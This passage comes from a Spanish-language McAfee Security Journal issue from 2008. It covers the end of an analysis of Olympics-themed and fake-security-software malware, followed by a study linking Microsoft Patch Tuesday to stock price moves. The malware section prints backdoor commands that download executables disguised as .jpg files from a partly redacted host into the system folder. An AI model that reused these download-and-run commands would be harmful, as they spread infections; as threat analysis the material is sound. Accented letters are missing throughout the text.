Esta tendencia del malware puede extenderse en los prximos meses, lo cual es motivo de seria preocupacin, porque la mayora de la gente confa en los proveedores de seguridad. Si se pierde esta confianza, probablemente sufrirn todava muchos usuarios ms.

software y sitios no autorizadoslas interceptaciones imaginativas en ataques de ingeniera social no se limitan a acontecimientos deportivos. Durante varios meses hemos percibido un incremento del software malicioso que se presenta en forma de aplicaciones de proveedores de seguridad. aparentando ser de ayuda, estos programas logran que las vctimas infecten su propio sistema. algunas variantes del troyano Fakealert7 advierten a sus vctimas de que su equipo est infectado (no les encanta la irona?) y proporcionan informacin (a menudo Url maliciosas) para que se descarguen herramientas antispyware, que en realidad son tambin aplicaciones no autorizadas. Dada la importancia de mantener el software actualizado, no han tardado mucho en aparecer sitios Web de actualizaciones no autorizados imitando el sitio autntico de Windows Update. recientemente hemos descubierto un sofisticado mtodo que utilizaba componentes Dll vinculados a un sitio Windows Update falso e impeda que Internet explorer alertara a los usuarios cuando un servidor Web remoto empleaba un certificado no vlido para un sitio Web seguro (HTTPs). el objetivo de este ataque era disfrazar los archivos maliciosos de verdaderas actualizaciones de Windows para que las vctimas las descargaran y ejecutaran. esta tendencia del malware puede extenderse en los prximos meses, lo cual es motivo de seria preocupacin, porque la mayora de la gente confa en los proveedores de seguridad. si se pierde esta confianza, probablemente sufrirn todava muchos usuarios ms.

@n11@http://www1.palms[eliminado]/ld/v2/sy64. jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d 302f7a58aeb1@ @n11@http://www1.palms[eliminado]/ld/v2/200764.jpg @% SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f fd48c@.

aproximadamente, estos comandos quieren decir Descargar el archivo de extensin .JPg mencionado e introducirlo en la carpeta %SysDir% del sistema de la vctima utilizando el nombre indicado del archivo ejecutable. la ltima parte de la respuesta es el hash md5 del archivo que va a descargarse (y que servir para comprobar su integridad). Durante todo este proceso, las vctimas no tienen ni idea de lo que est ocurriendo en segundo plano. Mientras leen y rellenan la declaracin que ha presentado el archivo PDF malicioso, en su sistema se instala silenciosamente una puerta trasera a la espera de los comandos del atacante. en ese momento, en el equipo tambin pueden descargarse otros archivos maliciosos, ya que su seguridad se ha quebrantado por completo.

20

McaFee secUrITy JoUrnal

conclusinlos acontecimientos deportivos se utilizan con frecuencia como cebo en ataques de ingeniera social. era fcil suponer que los desarrolladores de malware dirigiran su atencin a los Juegos olmpicos de Pekn. el acto contena todos los ingredientes para una receta perfecta: pequeos ataques escogidos que crecan en alcance a medida que se elevaba el nmero de vctimas interesadas en el tema. este crecimiento fue posible gracias a la estrecha relacin de varios temas entre s: la preocupacin por el Tbet dio paso al relevo de la antorcha, que a su vez desemboc en los propios Juegos olmpicos. a menudo los medios de comunicacin desempean un papel importante en la popularidad de un acontecimiento. su trabajo induce a algunas vctimas a buscar ms informacin, pero stas tropiezan muchas veces con sitios Web relacionados pero maliciosos o, ms habitualmente, con sitios Web legtimos que ya no son seguros y que infectan con sigilo a sus confiados visitantes. estos ataques son tan elaborados que lo ms probable es que las vctimas no sospechen nada. como hemos visto en este estudio, no slo nos enfrentamos a amenazas de remitentes desconocidos y datos con extensin .exe adjuntos al correo electrnico. Tambin los documentos legtimos (Microsoft Word, Microsoft excel, Microsoft PowerPoint y otros) pueden ser malintencionados. en parte, estos ataques tienen tanto xito por la ingenua creencia de que los archivos de datos no pueden contener malware. al final, la gente acaba por conocer los trucos habituales, lo que a su vez obliga a los agresores a ser ms creativos y malvados en sus tcnicas para, as, seguir venciendo a sus vctimas.

Elodie Grandjean trabaja como investigadora de virus para Mcafee avert labs en Francia desde enero de 2005. Posee ms de cinco aos de experiencia en ingeniera inversa con plataformas Windows. elodie se ha especializado en tcnicas de anti-ingeniera inversa, desempaquetado y descifrado, y ha escrito para la revista de seguridad francesa MISC: MultiSystem & Internet Security Cookbook. si no est analizando malware o programando, seguramente elodie est navegando por Internet, a menos que asista a un concierto o disfrute de una cerveza belga en un bar con sus amigos.

NOTAS1 Fribet, Mcafee VIl. http://vil.nai.com/vil/content/v_144356.htm 2 Is Malware Writing the next olympic event? (est el malware escribiendo el prximo acontecimiento olmpico) Mcafee avert labs Blog. http://www.avertlabs.com/research/blog/index.php/2008/04/14/ is-malware-writing-the-next-olympic-event/ 3 BackDoor-DoW, Mcafee VIl. http://vil.nai.com/vil/content/v_144476.htm 4 services, Microsoft Developer network. http://msdn.microsoft.com/en-us/library/ms685141(Vs.85).aspx 5 registry, Microsoft Developer network. http://msdn.microsoft.com/en-us/library/ms724871(Vs.85).aspx 6 Descripcin de svchost.exe en Windows XP Professional edition, Microsoft ayuda y soporte. http://support.microsoft.com/kb/314056/es 7 Fakealert-B, Mcafee VIl. http://vil.nai.com/vil/content/v_139058.htm Fakealert-c. http://vil.nai.com/vil/content/v_139219.htm Fakealert-D. http://vil.nai.com/vil/content/v_140346.htm Fakealert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm Fakealert-H. http://vil.nai.com/vil/content/v_141377.htm Fakealert-I. http://vil.nai.com/vil/content/v_141466.htm Fakealert-g. http://vil.nai.com/vil/content/v_141163.htm Fakealert-M. http://vil.nai.com/vil/content/v_142807.htm Fakealert-Q. http://vil.nai.com/vil/content/v_143088.htm Fakealert-r. http://vil.nai.com/vil/content/v_143102.htm Fakealert-s.dll. http://vil.nai.com/vil/content/v_143110.htm Fakealert-T. http://vil.nai.com/vil/content/v_143406.htm generic Fakealert.a. http://vil.nai.com/vil/content/v_143470.htm

oToo 2008

21

Vulnerabilidades en los mercados de valoresAnthony Bettini

la reciente confusin crediticia en los mercados de valores y derivados ha puesto de relieve numerosas facetas de la industria financiera que no se limitan a las estructuras de control reglamentarias, agencias de calificacin crediticia, fondos de inversin libre, inversiones en capital riesgo, fondos de pensiones y otros creadores de mercado.esta atencin continua por parte de los medios de comunicacin ha hecho crecer el inters por la ingeniera financiera de las personas que trabajan en ciencias relacionadas (como bioinformtica, informtica, etc.). con nuestro historial en investigacin de vulnerabilidades y dado el contexto de repercusin en los medios de comunicacin de la crisis crediticia, es natural buscar vulnerabilidades en el mercado de valores y derivados. en la conferencia sobre seguridad Black Hat 2007 que se celebra en estados Unidos, la firma de investigacin y desarrollo de seguridad Matasano security examinaba el protocolo de intercambio de informacin financiera (Financial Information eXchange, FIX), que es el pilar para la transmisin de mensajes entre los directores de inversin encargados de numerosas operaciones en nombre de clientes e intermediarios financieros y agentes de bolsa1,2. en la investigacin de Matasano se planteaban cuestiones como Qu vulnerabilidades pueden encontrarse en el protocolo FIX?. sin duda fue un interesante anlisis de los protocolos financieros desde la perspectiva de los puntos dbiles de la seguridad. sin embargo, nuestro artculo ofrecer otro enfoque: a nosotros ms que el aspecto de las vulnerabilidades nos preocupa la ingeniera financiera y social. nuestra investigacin comienza con las siguientes preguntas:

Qu pasa con las amenazas de tipo zero-day? Tienen siquiera constancia de estos eventos los inversores? se producen en la actualidad eventos de ingeniera social relacionados con las vulnerabilidades y las acciones? Podramos asistir un aumento de este tipo de eventos en el futuro?

este es un tema de estudio muy amplio, as que comenzaremos por analizar solamente las vulnerabilidades de los productos de Microsoft. en el futuro cercano, esperamos aportar datos complementarios sobre otros desarrolladores de software, as como una comparativa del aspecto financiero de los mtodos de distribucin de parches (por ejemplo, la distribucin mensual de Microsoft o la trimestral de oracle, comparadas con la distribucin no planificada de otros proveedores, que se ajusta segn las necesidades de cada momento).

la hiptesisel Martes de parches es el segundo martes de cada mes. es el nico da del mes que Microsoft distribuye sobre todo actualizaciones de seguridad y funcionales para Windows y el resto de sus aplicaciones. nuestra hiptesis es que los Martes de parches hay una tendencia a la baja del precio de las acciones de Microsoft (smbolo de cotizacin: MsFT). esta presin se debe probablemente a las reacciones ante los artculos que aparecen sobre las implicaciones negativas de las vulnerabilidades de seguridad en el software de Microsoft. De manera anloga, al da siguiente, mircoles, es de esperar que se produzca una recuperacin, una vez que los inversores se percaten de que los valores de Microsoft se sobrevendieron el da anterior.

Qu efectos tiene en las cotizaciones burstiles el Martes de parches de Microsoft? y el da anterior al Martes de parches? y el da despus (denominado en ocasiones "Mircoles de ataques")? y los Jueves de notificaciones avanzadas?

22

McaFee secUrITy JoUrnal

Hay quien que gana dinero los Martes de parches?Parece ser que es as. al menos parece evidente la relacin entre las fluctuaciones del precio por accin de Microsoft y el ciclo de distribucin de los Martes de parches. Por ejemplo, examinemos la Figura 1. la primera fila Media anual es la media base entre el precio por accin de Microsoft al inicio de la jornada y la cotizacin al cierre. se incluye como alternativa base los Das sin eventos, que excluyen eventos como las notificaciones avanzadas y el Martes de parches. Por regla general, parece que cuando Microsoft publica una notificacin avanzada la cotizacin sufre una presin a la baja ms fuerte de lo habitual. Del mismo modo, est presin a la baja tambin se observa los Martes de parches. y lo que es an ms interesante es que los llamados Mircoles de ataques (da despus del Martes de parches), como media, el valor experimenta una recuperacin o un cierre neto positivo. esto probablemente se deba a que los inversores institucionalesEl precio de las acciones de Microsoft cambia desde la apertura al cierre de la jornada burstil.VARIACIN DE MSFT DE APERTURA A CIERRE 2008 2007 2006

o los creadores de mercado consideran que el da anterior la venta de acciones de Microsoft como consecuencia de las malas noticias fue excesiva y que, en realidad, el valor real de Microsoft como inversin slo se vio afectado mnimamente. es de destacar que esta tendencia ha sido constante durante los ltimos tres aos y contina en la actualidad. aunque posiblemente sea ms fcil entender la variacin del precio de la apertura al cierre, tambin pueden apreciarse las tendencias en la diferencia media entre el precio inicial y el precio mximo (cotizacin del da) y en la diferencia media entre el precio inicial y el precio mnimo, aunque, en algunos casos, este efecto no es tan acusado. en la Figura 2 observamos que generalmente el valor mximo intrada medio en un da de notificacin avanzada y un Martes de parches es inferior al valor mximo intrada medio del ao. Tambin observamos que el valor mximo intrada medio del da siguiente al Martes de parches suele ser superior, lo que indica mayores presiones al alza.

Valor mnimo intrada de Microsoft a la apertura

VARIACIN DE MSFT DE APERTURA A MN

2008

2007

2006

Media anual Das sin eventos Notificacin avanzada Martes de parches Todos los martes Martes, excepto los de parches Da despus del Martes de parches Todos los mircoles Mircoles, excepto el da despus del Martes de parches

-0,17% -0,20% -0,43% -0,45% 0,16% 0,37% 0,49% -0,18% -0,40%

0,06% 0,07% -0,12% -0,29% 0,05% 0,15% 0,21% 0,44% 0,51%

0,08% 0,08% -0,08% -0,11% -0,03% -0,01% 0,27% 0,29% 0,26%

Media anual Das sin eventos Notificacin avanzada Martes de parches Todos los martes Martes, excepto los de parches Da despus del Martes de parches Todos los mircoles Mircoles, excepto el da despus del Martes de parches

-1,35% -1,39% -1,24% -1,58% -1,16% -1,01% -0,91% -1,39% -1,56%

-0,89% -0,90% -1,24% -0,99% -0,81% -0,76% -0,74% -0,78% -0,79%

-0,64% -0,64% -0,36% -0,93% -0,74% -0,68% -0,47% -0,51% -0,54%

Figura 1: Si se analiza el cambio de las cotizaciones de Microsoft en das clave, se observar una tendencia constante durante tres aos. Valor mximo intrada de Microsoft a la aperturaVARIACIN DE MSFT DE APERTURA A MX

Figura 3: El Martes de parches conserva su posicin "baja" cuando se compara con el mnimo medio intrada del ao.

2008

2007

2006

Media anual Das sin eventos Notificacin avanzada Martes de parches Todos los martes Martes, excepto los de parches Da despus del Martes de parches Todos los mircoles Mircoles, excepto el da despus del Martes de parches

1,28% 1,34% 0,93% 0,92% 1,35% 1,50% 1,52% 1,25% 1,17%

0,97% 0,95% 1,08% 0,98% 1,01% 1,02% 1,30% 1,24% 1,23%

0,88% 0,88% 0,58% 0,67% 0,92% 0,99% 0,70% 0,92% 0,95%

Figura 2: En la contratacin intrada en los das de Notificacin avanzada y los Martes de parches la cotizacin es siempre inferior a la de los dems das del ao. oToo 2008 23

en la Figura 3 observamos que generalmente el valor mnimo intrada medio de un Martes de parches es inferior al valor mnimo intrada medio del ao. sin embargo, los das de notificacin avanzada, los resultados no estn tan claros. es tambin relevante que el valor mnimo intrada m